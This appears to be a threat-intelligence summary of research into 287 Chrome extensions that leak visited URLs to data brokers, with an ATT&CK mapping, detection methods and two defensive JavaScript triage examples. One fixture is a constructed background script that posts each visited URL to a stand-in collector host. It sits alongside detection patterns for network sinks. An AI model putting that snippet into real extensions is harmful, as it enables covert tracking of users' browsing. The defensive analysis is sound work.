Full Report
Add-ons with 37M installs leak visited URLs to 30+ recipients, researcher says They know where you've been and they're going to share it. A security researcher has identified 287 Chrome extensions that allegedly exfiltrate browsing history data for an estimated 37.4 million installations.…
Analysis Summary
# Tool/Technique: Leaking Chrome Extensions (Data Exfiltration Mechanism)
## Overview
A collection of 287 identified Chrome browser extensions that covertly exfiltrate sensitive user browsing history data to numerous third-party recipients, including data brokers. The primary purpose is unauthorized data harvesting for commercial resale.
## Technical Details
- Type: Technique (Exploitation of browser extension trust model) / Malware (specifically, malicious code embedded in legitimate-appearing software)
- Platform: Google Chrome desktop extension ecosystem (extensions distributed through the Chrome Web Store and running inside the browser process).
- Capabilities: Collection and exfiltration of visited URLs (browsing history).
- First Seen: The article frames this as a long-standing problem, citing research dating back to 2017; the specific findings summarised here were documented by "Q Continuum" in early 2026.
## MITRE ATT&CK Mapping
The activity is collection and exfiltration of browsing data carried out by an installed extension; the closest mappings are:
- TA0001 - Initial Access
- T1204.002 - User Execution: Malicious File (users install the extension themselves; a Web Store install is the only entry point the article describes)
- TA0003 - Persistence
- T1176 - Browser Extensions (the extension is the implant and runs on every browser start; in newer ATT&CK releases this is sub-technique T1176.001 under Software Extensions)
- TA0005 - Defense Evasion
- T1036 - Masquerading (the extensions present as harmless utilities with benign store listings; the article describes no hiding of on-disk artifacts, so T1564.003 Hidden Files and Directories is not supported)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel (visited URLs are posted to recipient endpoints over ordinary HTTPS; where the recipient is a commercial analytics/web service rather than actor-run infrastructure, T1567 Exfiltration Over Web Service is the better fit)
## Functionality
### Core Capabilities
- **Data Collection:** Monitoring and recording of the user's browsing history (websites visited).
- **Data Dissemination:** Sending the collected browsing history data to over 30 identified third-party recipients/data brokers.
- **Deception:** Masquerading as seemingly "harmless tools" while requesting permissions far broader than the advertised function needs, which is exactly the access surveillance requires.
### Advanced Features
- **Commercialization Focus:** The exfiltrated data is specifically noted to be sold to large corporate entities, including data brokers like Similarweb, Big Star Labs, Semrush, etc.
- **Obscured Consent:** Data harvesting practices are intentionally obscured within privacy policies, leading to users consenting without full awareness.
- **Scale:** Affecting an estimated 37.4 million installations across the 287 identified extensions.
## Indicators of Compromise
*Note: Specific non-defanged domains/IPs are not provided in the article, so environmental and behavioral indicators are prioritized.*
- File Hashes: N/A (the article names no packages; Web Store extensions are identified by a 32-character ID and update in place, so a hash pins only one version).
- File Names: N/A (the article does not list the 287 extension names).
- Registry Keys: N/A (Chrome keeps extension state in the browser profile, e.g. the `Extensions\<extension-id>\<version>\` directory and the `Preferences`/`Secure Preferences` files under the profile folder, not in the registry; only policy-installed extensions appear under the Chrome policy registry keys).
- Network Indicators: Data exfiltration traffic directed towards domains associated with data aggregation companies (e.g., Similarweb, Alibaba Group, ByteDance infrastructure). *These domains must be identified by reverse engineering the extensions or by network monitoring; the article does not publish them.*
- Behavioral Indicators: Extensions that hold the `history`, `tabs`, `webNavigation` or `webRequest` permission, or a broad host permission such as `<all_urls>`, and whose background script or service worker makes an outbound request to a fixed third-party endpoint after each navigation event.
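One way to turn the behavioural indicator above into a repeatable check is static triage of an unpacked extension: flag the combination of a permission that exposes visited URLs and a navigation listener wired to a network-sending API in the extension's own scripts. The following is an added example, not code from the article or from the Q Continuum/Ex-Ray research; the sample manifest, the background script and the `collector.example.invalid` hostname are constructed for illustration and are not indicators from the article.

```javascript
// Added example (not from the article): static triage of one unpacked Chrome
// extension for the two ingredients of a history leak, (1) a permission set that
// exposes visited URLs and (2) a navigation hook wired to a network sink.
// SAMPLE_MANIFEST, SAMPLE_BACKGROUND and the collector hostname are constructed.

// API permissions through which an extension can read visited URLs.
const URL_OBSERVING_PERMISSIONS = new Set(["history", "tabs", "webNavigation", "webRequest"]);
// Host patterns granting access to every site (content scripts then see location.href).
const BROAD_HOST_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

function triageManifest(manifest) {
  const declared = manifest.permissions || [];
  // MV3 lists host patterns under host_permissions; MV2 mixed them into permissions.
  const hosts = [
    ...(manifest.host_permissions || []),
    ...declared.filter((p) => p === "<all_urls>" || p.includes("://")),
  ];
  const urlPerms = declared.filter((p) => URL_OBSERVING_PERMISSIONS.has(p));
  const broadHosts = hosts.filter((p) => BROAD_HOST_PATTERNS.has(p));
  return { urlPerms, broadHosts, canSeeUrls: urlPerms.length > 0 || broadHosts.length > 0 };
}

// Listeners that fire on navigation, and APIs that move data off the machine.
const NAV_HOOKS = [
  /chrome\.webNavigation\.on(?:Completed|Committed|BeforeNavigate)\.addListener/,
  /chrome\.tabs\.onUpdated\.addListener/,
  /chrome\.history\.(?:search|onVisited\.addListener)/,
];
const NETWORK_SINKS = [
  /\bfetch\s*\(/, /new\s+XMLHttpRequest\s*\(/, /navigator\.sendBeacon\s*\(/, /new\s+WebSocket\s*\(/,
];
// Hard-coded absolute URLs in the script; their hostnames are candidate collectors.
const URL_LITERAL = /https?:\/\/[^\s"'`)]+/gi;

function triageScript(source) {
  const hooks = NAV_HOOKS.filter((re) => re.test(source)).map((re) => re.source);
  const sinks = NETWORK_SINKS.filter((re) => re.test(source)).map((re) => re.source);
  const destinations = [];
  for (const literal of source.match(URL_LITERAL) || []) {
    try { destinations.push(new URL(literal).hostname); } catch { /* not a parseable URL */ }
  }
  return { hooks, sinks, destinations };
}

// Combines manifest and script findings into a triage verdict for one extension.
function triageExtension(manifest, scripts) {
  const m = triageManifest(manifest);
  const perScript = scripts.map(triageScript);
  const hooks = [...new Set(perScript.flatMap((x) => x.hooks))];
  const sinks = [...new Set(perScript.flatMap((x) => x.sinks))];
  const destinations = [...new Set(perScript.flatMap((x) => x.destinations))];
  let verdict = "low";
  if (m.canSeeUrls && hooks.length > 0 && sinks.length > 0) {
    verdict = "review";          // sees URLs, reacts to navigation, and sends data out
  } else if (m.canSeeUrls) {
    verdict = "capability-only"; // over-privileged, but no hook+sink pair found statically
  }
  return { name: manifest.name, verdict, ...m, hooks, sinks, destinations };
}

// Constructed sample: a "page tools" extension whose service worker posts every
// top-frame URL to a fixed endpoint. Both the manifest and the script are invented.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Example Page Tools",
  permissions: ["webNavigation", "storage"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "background.js" },
};
const SAMPLE_BACKGROUND = `
chrome.webNavigation.onCompleted.addListener((details) => {
  if (details.frameId !== 0) return;
  fetch("https://collector.example.invalid/v1/visit", {
    method: "POST",
    body: JSON.stringify({ u: details.url, t: Date.now() }),
  });
});
`;

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, [SAMPLE_BACKGROUND]), null, 2));
```

The verdict is deliberately "review", not "malicious": a legitimate history-search or tab-manager extension can hit the same pattern, and obfuscated or dynamically assembled endpoints escape the URL regex entirely, so a "capability-only" result on an extension with an unrelated stated purpose still deserves a manual look.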
## Associated Threat Actors
The activity appears driven by financially motivated entities seeking to profit from user data, including:
- Data Brokers (e.g., Similarweb, and Big Star Labs, which the article describes as an arm of Similarweb).
- Other Commercial Entities (e.g., Semrush, Alibaba Group, ByteDance).
- The developers/vendors of the specific 287 malicious extensions.
## Detection Methods
- Signature-based detection: Blocking or alerting on the network destinations of the data aggregators named in the research once they have been extracted from the extensions; this catches known recipients only, and endpoints change between extension versions.
- Behavioral detection: Monitoring for an extension's background script or service worker making outbound connections shortly after each page navigation, to a destination that is unrelated to the site visited and that recurs across many different sites; a request carrying the just-visited URL in its body or query string is the strongest signal.
- YARA rules: Applicable to the unpacked extension sources (a `.crx` is a ZIP container; `manifest.json` and the scripts can be scanned once extracted, or directly in the profile's `Extensions` directory). Rules keyed on navigation listeners combined with a network call and a hard-coded collector URL are workable; rules on the packaged `.crx` alone are not.
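The behavioural detection above can be run directly over proxy logs: for each top-level navigation, collect the third-party destinations the same client contacts within a short window, and rank destinations by the share of navigations they follow regardless of which site was visited. The code below is an added example and is not part of the article or the cited research; the space-separated log format, every log line, the client address and the `collector.example.invalid` hostname are constructed for the example.

```javascript
// Added example (not from the article): ranks third-party destinations by how
// consistently they are contacted right after page navigations in a proxy log.
// The log format and all lines are constructed: "timestamp client method url content-type".
const SAMPLE_PROXY_LOG = [
  "2026-02-03T09:00:00.000Z 10.0.0.5 GET https://news.example.org/ text/html",
  "2026-02-03T09:00:00.150Z 10.0.0.5 GET https://fonts.example.net/font.woff2 font/woff2",
  "2026-02-03T09:00:00.420Z 10.0.0.5 POST https://collector.example.invalid/v1/visit application/json",
  "2026-02-03T09:00:12.000Z 10.0.0.5 GET https://shop.example.com/cart text/html",
  "2026-02-03T09:00:12.310Z 10.0.0.5 POST https://collector.example.invalid/v1/visit application/json",
  "2026-02-03T09:00:12.500Z 10.0.0.5 POST https://api.shop.example.com/cart/items application/json",
  "2026-02-03T09:00:30.000Z 10.0.0.5 GET https://intranet.corp.example/hr/payslip text/html",
  "2026-02-03T09:00:30.280Z 10.0.0.5 POST https://collector.example.invalid/v1/visit application/json",
  "2026-02-03T09:00:45.000Z 10.0.0.5 GET https://mail.example.org/inbox text/html",
  "2026-02-03T09:00:45.100Z 10.0.0.5 GET https://fonts.example.net/font.woff2 font/woff2",
  "2026-02-03T09:00:45.390Z 10.0.0.5 POST https://collector.example.invalid/v1/visit application/json",
  // A beacon with no navigation in the preceding window is not attributed to any page.
  "2026-02-03T09:05:00.000Z 10.0.0.5 POST https://collector.example.invalid/v1/visit application/json",
];

// Parses one constructed log line into a record with a numeric timestamp.
function parseLine(line) {
  const [ts, client, method, url, contentType] = line.trim().split(/\s+/);
  return { ts: Date.parse(ts), client, method, host: new URL(url).hostname, contentType };
}

// Approximates the registrable site as the last two host labels (no public-suffix list).
function siteOf(host) {
  return host.split(".").slice(-2).join(".");
}

// In this log format a top-level navigation is a GET whose response is an HTML document.
function isNavigation(e) {
  return e.method === "GET" && e.contentType.startsWith("text/html");
}

// Returns destinations sorted by the fraction of navigations they follow within windowMs.
// A destination is flagged when it follows at least minRatio of all navigations and
// those navigations span at least minSites distinct sites.
function rankDestinations(lines, { windowMs = 2000, minRatio = 0.8, minSites = 2 } = {}) {
  const entries = lines.map(parseLine).sort((a, b) => a.ts - b.ts);
  const navs = entries.filter(isNavigation);
  const stats = new Map(); // host -> { followed: Set<navIndex>, sites: Set<site> }
  navs.forEach((nav, i) => {
    for (let j = entries.indexOf(nav) + 1; j < entries.length; j++) {
      const e = entries[j];
      if (e.client !== nav.client) continue;
      // The attribution window closes on timeout or at the client's next navigation.
      if (e.ts - nav.ts > windowMs || isNavigation(e)) break;
      if (siteOf(e.host) === siteOf(nav.host)) continue; // first-party traffic is expected
      const s = stats.get(e.host) || { followed: new Set(), sites: new Set() };
      s.followed.add(i);
      s.sites.add(siteOf(nav.host));
      stats.set(e.host, s);
    }
  });
  return [...stats]
    .map(([host, s]) => ({
      host,
      followed: s.followed.size,
      total: navs.length,
      ratio: s.followed.size / navs.length,
      sites: s.sites.size,
      flagged: s.followed.size / navs.length >= minRatio && s.sites.size >= minSites,
    }))
    .sort((a, b) => b.ratio - a.ratio);
}

console.log(rankDestinations(SAMPLE_PROXY_LOG).filter((d) => d.flagged));
```

On the constructed log the collector follows all four navigations across three unrelated sites and is flagged, the shared font host follows only half of them and is not, and the API call to the shop's own subdomain is excluded as first-party. Against real logs the two knobs that matter are the window (extensions usually fire on `onCompleted`, so a few hundred milliseconds after the document load is typical) and the distinct-site threshold, which is what separates a collector from an ordinary CDN or analytics tag embedded by a handful of sites.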
## Mitigation Strategies
- **User Awareness:** Educating users on the risks of free software and the permissions granted to browser extensions.
- **Policy Enforcement:** Consistent enforcement of the Chrome Web Store's Limited Use policy, closing the exceptions under which data broker collection currently passes review.
- **Application Control:** Restricting extension installation with Chrome enterprise policy, i.e. `ExtensionInstallBlocklist` set to `*` with a vetted `ExtensionInstallAllowlist`, or the equivalent `ExtensionSettings` policy, which can additionally deny specific permissions (for example `history` or `webNavigation`) even to allowed extensions.
- **Proxy/Network Monitoring:** Analysing outbound traffic from browser processes for connections to known data brokers, and for destinations that are contacted right after most page navigations regardless of the site visited; a single unusual high-volume destination is a weaker signal than that recurrence.
## Related Tools/Techniques
- Previous findings regarding other extensions capturing chatbot conversations.
- Research on generative AI extensions capturing sensitive user data (March 2025 findings mentioned).
- Ex-Ray: Detection of History-Leaking Browser Extensions (The underlying research methodology Q Continuum built upon).